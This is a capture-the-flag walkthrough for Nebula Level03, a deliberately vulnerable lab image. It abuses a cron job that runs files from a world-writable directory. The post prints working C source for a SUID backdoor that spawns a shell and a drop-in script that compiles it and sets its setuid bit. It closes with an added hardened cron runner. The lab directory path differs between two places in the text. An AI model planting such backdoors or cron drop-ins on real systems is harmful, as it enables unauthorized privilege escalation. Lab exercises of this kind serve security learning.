How to pwn Nebula: Level03 - This crontab will kill you


Exploit-Exercises: Nebula


Level03 - This crontab will kill you

In this level, take advantage of weak file permissions and a crontab job to get a shell and get the flag!
Let's go!

Here is what Exploit-Exercises tells us about the level:

Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.

Here is the script executed by crontab:

#!/bin/bash

for i in /home/writable.d/* ; do
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done

The script simply executes every file in /home/writable.d. This directory has 777 permissions, so you have full rights to write, read and execute.

This script will help us run a shell as flag03.

First, let's make a simple SUID backdoor in C:

vim /tmp/shell.c

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/bin/sh");
  return 0;
}

This C program will run as flag03. Now, in /home/flag03/writable.d/, create a script that will compile your shell and set its permissions:

#!/bin/bash
gcc /tmp/shell.c -o shell
chmod +s shell

Then run:

watch ls -lR /home/flag03/

This will run ls every 2 seconds on the flag03 directory; you will see your shell appear.
The -l argument shows you permissions, and -R lists directories recursively.

The shell is in the /home/flag03 directory and is setuid; run it to pwn the level!

Congratulations!
See you for the next level!
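
The level works because the cron job runs, as flag03, every file found in a directory that any user can write to. The following is an added example, not part of the original post or the Nebula image: a hardened variant of the cron script that refuses a drop directory or job file that is not private to the account running it. The function names `is_private` and `run_jobs` are hypothetical, and GNU `stat` is assumed.

```shell
#!/bin/bash
# Added example: hardened version of the cron runner shown in the post.
# Assumption: jobs are legitimate only when both the drop directory and the
# job file belong to the account the cron job runs as and nobody else can
# write to them.

# is_private PATH: succeed only if PATH is owned by the current user and
# carries no group-write or other-write bit.
is_private() {
    path=$1
    owner=$(stat -c '%u' -- "$path") || return 1
    mode=$(stat -c '%a' -- "$path") || return 1
    [ "$owner" -eq "$(id -u)" ] || return 1
    # In an octal digit, the values 2, 3, 6 and 7 have the write bit set.
    case $mode in
        *[2367]?) return 1 ;;   # group-writable
        *[2367])  return 1 ;;   # world-writable
    esac
    return 0
}

# run_jobs DIR: run the regular files in DIR, but only when DIR itself and
# each file pass is_private. Returns 1 without running anything if DIR is
# writable by other users (the 777 case from the level).
run_jobs() {
    dir=$1
    if ! is_private "$dir"; then
        echo "refusing: $dir is not private to uid $(id -u)" >&2
        return 1
    fi
    for f in "$dir"/*; do
        # Skip the unmatched glob, directories and symlinks.
        [ -f "$f" ] && [ ! -L "$f" ] || continue
        if is_private "$f"; then
            (ulimit -t 5; bash "$f") || echo "job failed: $f" >&2
        else
            echo "skipping untrusted file: $f" >&2
        fi
    done
    return 0
}
```

A cron entry would call `run_jobs` with the drop directory as its only argument; with the level's 777 directory it runs nothing and logs the refusal.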

